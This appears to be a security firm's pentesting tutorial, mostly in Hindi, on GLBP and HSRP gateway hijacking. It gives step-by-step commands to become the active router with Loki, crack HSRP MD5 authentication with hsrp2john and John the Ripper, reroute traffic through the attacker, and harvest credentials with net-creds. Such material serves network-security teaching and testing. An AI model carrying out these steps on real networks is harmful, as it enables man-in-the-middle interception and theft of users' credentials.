GLBP & HSRP Attacks

Websec | Uw Cybersecurity Specialist

FHRP Hijacking Overview

Insights into FHRP

FHRP को नेटवर्क की मजबूती प्रदान करने के लिए डिज़ाइन किया गया है, जो कई राउटर को एकल वर्चुअल यूनिट में मिलाता है, इस प्रकार लोड वितरण और दोष सहिष्णुता को बढ़ाता है। Cisco Systems ने इस सूट में प्रमुख प्रोटोकॉल पेश किए, जैसे GLBP और HSRP।

GLBP Protocol Insights

Cisco का निर्माण, GLBP, TCP/IP स्टैक पर कार्य करता है, संचार के लिए UDP का उपयोग करते हुए पोर्ट 3222 पर। GLBP समूह में राउटर "हैलो" पैकेट 3 सेकंड के अंतराल पर आदान-प्रदान करते हैं। यदि कोई राउटर 10 सेकंड के लिए इन पैकेट को भेजने में विफल रहता है, तो इसे ऑफ़लाइन माना जाता है। हालाँकि, ये टाइमर निश्चित नहीं हैं और इन्हें संशोधित किया जा सकता है।

GLBP Operations and Load Distribution

GLBP राउटर के बीच लोड वितरण को सक्षम बनाकर अलग खड़ा होता है, जो एकल वर्चुअल IP के साथ कई वर्चुअल MAC पते का उपयोग करता है। GLBP समूह में, प्रत्येक राउटर पैकेट फॉरवर्डिंग में शामिल होता है। HSRP/VRRP के विपरीत, GLBP कई तंत्रों के माध्यम से वास्तविक लोड संतुलन प्रदान करता है:

• Host-Dependent Load Balancing: एक होस्ट को स्थिर AVF MAC पता असाइनमेंट बनाए रखता है, जो स्थिर NAT कॉन्फ़िगरेशन के लिए आवश्यक है।

• Round-Robin Load Balancing: डिफ़ॉल्ट दृष्टिकोण, अनुरोध करने वाले होस्टों के बीच AVF MAC पता असाइनमेंट को वैकल्पिक करता है।

• Weighted Round-Robin Load Balancing: पूर्वनिर्धारित "वजन" मैट्रिक्स के आधार पर लोड वितरित करता है।

Key Components and Terminologies in GLBP

• AVG (Active Virtual Gateway): मुख्य राउटर, जो समकक्ष राउटर को MAC पते आवंटित करने के लिए जिम्मेदार है।

• AVF (Active Virtual Forwarder): एक राउटर जिसे नेटवर्क ट्रैफ़िक प्रबंधित करने के लिए नामित किया गया है।

• GLBP Priority: एक मैट्रिक जो AVG को निर्धारित करता है, जो 100 के डिफ़ॉल्ट से शुरू होता है और 1 से 255 के बीच होता है।

• GLBP Weight: एक राउटर पर वर्तमान लोड को दर्शाता है, जिसे मैन्युअल रूप से या ऑब्जेक्ट ट्रैकिंग के माध्यम से समायोजित किया जा सकता है।

• GLBP Virtual IP Address: सभी जुड़े उपकरणों के लिए नेटवर्क का डिफ़ॉल्ट गेटवे के रूप में कार्य करता है।

इंटरैक्शन के लिए, GLBP आरक्षित मल्टीकास्ट पते 224.0.0.102 और UDP पोर्ट 3222 का उपयोग करता है। राउटर 3 सेकंड के अंतराल पर "हैलो" पैकेट भेजते हैं, और यदि 10 सेकंड के दौरान कोई पैकेट छूट जाता है, तो उन्हें गैर-कार्यात्मक माना जाता है।

GLBP Attack Mechanism

एक हमलावर उच्चतम प्राथमिकता मान (255) के साथ GLBP पैकेट भेजकर प्राथमिक राउटर बन सकता है। इससे DoS या MITM हमलों का कारण बन सकता है, जिससे ट्रैफ़िक का अवरोधन या पुनर्निर्देशन संभव होता है।

Executing a GLBP Attack with Loki

Loki एक GLBP हमले को प्राथमिकता और वजन को 255 पर सेट करके पैकेट इंजेक्ट करके कर सकता है। हमले से पहले के चरणों में वर्चुअल IP पता, प्रमाणीकरण की उपस्थिति, और राउटर प्राथमिकता मानों जैसी जानकारी इकट्ठा करना शामिल है, जिसका उपयोग Wireshark जैसे उपकरणों से किया जाता है।

Attack Steps:

1. प्रमिस्क्यूस मोड में स्विच करें और IP फॉरवर्डिंग सक्षम करें।

2. लक्षित राउटर की पहचान करें और इसका IP प्राप्त करें।

3. एक Gratuitous ARP उत्पन्न करें।

4. AVG का अनुकरण करते हुए एक दुर्भावनापूर्ण GLBP पैकेट इंजेक्ट करें।

5. हमलावर के नेटवर्क इंटरफेस को GLBP वर्चुअल IP को दर्शाते हुए एक द्वितीयक IP पता असाइन करें।

6. पूर्ण ट्रैफ़िक दृश्यता के लिए SNAT लागू करें।

7. सुनिश्चित करें कि मूल AVG राउटर के माध्यम से इंटरनेट एक्सेस जारी रखने के लिए राउटिंग को समायोजित करें।

इन चरणों का पालन करके, हमलावर "मैन इन द मिडल" के रूप में खुद को स्थापित करता है, जो नेटवर्क ट्रैफ़िक का अवरोधन और विश्लेषण करने में सक्षम होता है, जिसमें असुरक्षित या संवेदनशील डेटा शामिल है।

For demonstration, here are the required command snippets:

# Enable promiscuous mode and IP forwarding
sudo ip link set eth0 promisc on
sudo sysctl -w net.ipv4.ip_forward=1

# Configure secondary IP and SNAT
sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

# Adjust routing
sudo route del default
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100

Monitoring and intercepting traffic can be done using net-creds.py or similar tools to capture and analyze data flowing through the compromised network.

Passive Explanation of HSRP Hijacking with Command Details

Overview of HSRP (Hot Standby Router/Redundancy Protocol)

HSRP एक Cisco का स्वामित्व वाला प्रोटोकॉल है जिसे नेटवर्क गेटवे की पुनरावृत्ति के लिए डिज़ाइन किया गया है। यह एक साझा IP पते के साथ कई भौतिक राउटरों को एकल तार्किक इकाई में कॉन्फ़िगर करने की अनुमति देता है। इस तार्किक इकाई का प्रबंधन एक प्राथमिक राउटर द्वारा किया जाता है जो ट्रैफ़िक को निर्देशित करने के लिए जिम्मेदार होता है। GLBP के विपरीत, जो लोड संतुलन के लिए प्राथमिकता और वजन जैसे मैट्रिक्स का उपयोग करता है, HSRP ट्रैफ़िक प्रबंधन के लिए एकल सक्रिय राउटर पर निर्भर करता है।

Roles and Terminology in HSRP

• HSRP Active Router: गेटवे के रूप में कार्य करने वाला उपकरण, ट्रैफ़िक प्रवाह का प्रबंधन करता है।

• HSRP Standby Router: एक बैकअप राउटर, जो सक्रिय राउटर के विफल होने पर कार्यभार संभालने के लिए तैयार है।

• HSRP Group: राउटरों का एक सेट जो एकल लचीला वर्चुअल राउटर बनाने के लिए सहयोग करता है।

• HSRP MAC Address: HSRP सेटअप में तार्किक राउटर को असाइन किया गया एक वर्चुअल MAC पता।

• HSRP Virtual IP Address: HSRP समूह का वर्चुअल IP पता, जो जुड़े उपकरणों के लिए डिफ़ॉल्ट गेटवे के रूप में कार्य करता है।

HSRP Versions

HSRP दो संस्करणों में आता है, HSRPv1 और HSRPv2, जो मुख्य रूप से समूह क्षमता, मल्टीकास्ट IP उपयोग और वर्चुअल MAC पता संरचना में भिन्न होते हैं। प्रोटोकॉल सेवा जानकारी के आदान-प्रदान के लिए विशिष्ट मल्टीकास्ट IP पतों का उपयोग करता है, जिसमें हर 3 सेकंड में Hello पैकेट भेजे जाते हैं। यदि 10 सेकंड के अंतराल में कोई पैकेट प्राप्त नहीं होता है, तो राउटर को निष्क्रिय माना जाता है।

HSRP Attack Mechanism

HSRP हमले सक्रिय राउटर की भूमिका को अधिकतम प्राथमिकता मान को इंजेक्ट करके बलात्कृत करने में शामिल होते हैं। इससे एक Man-In-The-Middle (MITM) हमला हो सकता है। आवश्यक पूर्व-हमला कदमों में HSRP सेटअप के बारे में डेटा एकत्र करना शामिल है, जिसे ट्रैफ़िक विश्लेषण के लिए Wireshark का उपयोग करके किया जा सकता है।

Steps for Bypassing HSRP Authentication

1. HSRP डेटा वाले नेटवर्क ट्रैफ़िक को .pcap फ़ाइल के रूप में सहेजें।

tcpdump -w hsrp_traffic.pcap

1. hsrp2john.py का उपयोग करके .pcap फ़ाइल से MD5 हैश निकालें।

python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes

1. John the Ripper का उपयोग करके MD5 हैश को क्रैक करें।

john --wordlist=mywordlist.txt hsrp_hashes

Executing HSRP Injection with Loki

1. HSRP विज्ञापनों की पहचान करने के लिए Loki लॉन्च करें।

2. नेटवर्क इंटरफ़ेस को प्रमिस्क्यूअस मोड में सेट करें और IP फॉरवर्डिंग सक्षम करें।

sudo ip link set eth0 promisc on
sudo sysctl -w net.ipv4.ip_forward=1

1. Loki का उपयोग करके विशिष्ट राउटर को लक्षित करें, क्रैक किया गया HSRP पासवर्ड दर्ज करें, और सक्रिय राउटर की नकल करने के लिए आवश्यक कॉन्फ़िगरेशन करें।

2. सक्रिय राउटर की भूमिका प्राप्त करने के बाद, अपने नेटवर्क इंटरफ़ेस और IP टेबल को वैध ट्रैफ़िक को इंटरसेप्ट करने के लिए कॉन्फ़िगर करें।

sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

1. राउटिंग तालिका को पूर्व सक्रिय राउटर के माध्यम से ट्रैफ़िक को रूट करने के लिए संशोधित करें।

sudo route del default
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100

1. इंटरसेप्टेड ट्रैफ़िक से क्रेडेंशियल कैप्चर करने के लिए net-creds.py या समान उपयोगिता का उपयोग करें।

sudo python2 net-creds.py -i eth0

इन चरणों को निष्पादित करने से हमलावर को ट्रैफ़िक को इंटरसेप्ट और हेरफेर करने की स्थिति में रखा जाता है, जो GLBP हाईजैकिंग की प्रक्रिया के समान है। यह HSRP जैसे पुनरावृत्ति प्रोटोकॉल में कमजोरियों और मजबूत सुरक्षा उपायों की आवश्यकता को उजागर करता है।

References

• https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9

Websec | Uw Cybersecurity Specialist